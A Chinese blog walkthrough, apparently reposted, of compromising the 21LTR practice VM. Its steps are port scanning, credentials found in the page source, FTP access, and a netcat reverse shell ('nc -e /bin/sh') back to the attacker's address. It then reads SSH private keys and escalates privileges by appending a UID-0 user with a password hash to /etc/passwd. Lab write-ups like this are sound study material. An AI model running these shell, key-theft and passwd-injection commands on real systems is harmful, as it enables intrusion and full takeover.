首页 > 其他分享 >21LTR靶机(漏洞复现)

21LTR靶机(漏洞复现)

时间:2024-09-18 18:50:52浏览次数:3  
标签:bin 21LTR 192.168 cat 复现 pty 靶机 root 连接

网卡配置

访问网页

端口扫描

nmap -sV -p- 192.168.2.120

0

目录扫描

右键检查,发现用户名和密码

尝试ssh连接,连接失败

尝试ftp连接,连接成功

发现一个backup_log.php文件

nc -e /bin/sh 192.168.2.128 5555

python -c 'import pty; pty.spawn("/bin/sh")'

提权

cd /media/USB_1/Stuff/Keys
ls
cat authorized_keys    #发现是hbeale用户

cat id_rsa

echo 'newuser:$1$Ed671o/.$SLi1S6D.lp5G24zQfGMCj.:0:0:root:/root:/bin/bash' >> /etc/passwd

标签:bin,21LTR,192.168,cat,复现,pty,靶机,root,连接
From: https://blog.csdn.net/2201_75569982/article/details/142340968

相关文章

  • vulnhub(9):sickos1.2(深挖靶机的各个细节、文件管道反弹shell详解、base64编码反弹shell
    端口nmap主机发现nmap-sn192.168.148.0/24​Nmapscanreportfor192.168.148.131Hostisup(0.00020slatency).​131是新出现的机器,他就是靶机nmap端口扫描nmap-Pn192.168.148.131-p---min-rate10000-oAnmap/scan扫描开放端口保存到nmap/scan下​......
  • 靶机 hackademic-udf提权
    sqlmap一把梭burpsuit跑账号密码,可能跑不出来,登录有点问题查不到有用信息,尝试内核提权提权成功拓展-mysqludf提权看到别人的wp改造一下靶机能学到别的东西https://blog.csdn.net/Bossfrank/article/details/131553175先拿到root权限,在/usr/lib/mysql/目录下将plugin目录的......
  • CVE-2021-24762 复现
    一看是个wordpress,看了下版本6.0没洞,直接扔wpscan扫一下发现了个插件一搜发现perfect-survey在1.5.2之前都有洞,直接搜exp打.上官网找了个API重扫一遍,直接给出了CVE号!直接找个sqlmap的exp跑一下,注意第二个位置选n来设置cookiesqlmap-u"http://eci-2zeg18fce0yxpb7p......
  • thewall靶机
    includes.php内有文件读取漏洞一开始是想着直接用为协议写入一句话木马但是后来发现不行因为他的文件读取方式长这样点击查看代码<?phpinclude('/var/www/html/waf.php');$page=str_replace(array('%','<','?','\\'),'',$_GET['display_pag......
  • Depth靶机详解
    靶机下载地址https://www.vulnhub.com/entry/depth-1,213/主机发现arp-scan-l端口扫描nmap-sV-A-T4192.168.229.156端口利用http://192.168.229.156:8080/目录扫描dirb"http://192.168.229.156:8080"dirsearch-u"http://192.168.229.156:8080"......
  • Dina靶机详解
    靶机下载https://www.vulnhub.com/entry/dina-101,200/靶机配置默认是桥接模式,切换为NAT模式后重启靶机主机发现arp-scan-l端口扫描nmap-sV-A-T4192.168.229.157发现80端口开启,访问访问网站目录扫描pythondirsearch.py-uhttp://192.168.229.157:8......
  • 【复现】考虑泊位优化和多能协同的港口综合能源系统运行优化(Matlab代码实现)
     ......
  • 商混erp系统多接口sql注入漏洞复现
    0x01漏洞描述:        商混ERP系统是一种针对混凝土行业开发的综合性企业资源规划(ERP)系统。它集成了生产、销售、采购、财务等各个方面的功能,为混凝土生产企业提供了一个全面、高效的数字化管理平台。在Operater_Action.aspx,StockreceiveEdit.aspx接口中存在sql注入,高......
  • DC-2靶机上了解和练习WordPress框架
    前言DC-2是一款非常受欢迎的靶机,通常用于学习和实践不同的安全工具和技术,特别是针对Web应用程序,比如WordPress。通过在DC-2靶机的这些练习,你将更好地理解和掌握搭建和管理一个安全、稳定、高效的WordPress博客所需的各种技能。环境搭建攻击机:KaliIP地址:192.168.18......
  • aspcms webshell漏洞复现
    1.【ip】/admin_aspcms/login.asp访问后台,admin123456登录2.点击【扩展功能】【幻灯片设置】点击【保存】开启代理进行抓包3.在抓取的数据包中修改slideTextStatus字段的值为以下代码并进行发包访问影响文件字段值1%25><%25Eval(Request(chr(65)))%25><%25密码是......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99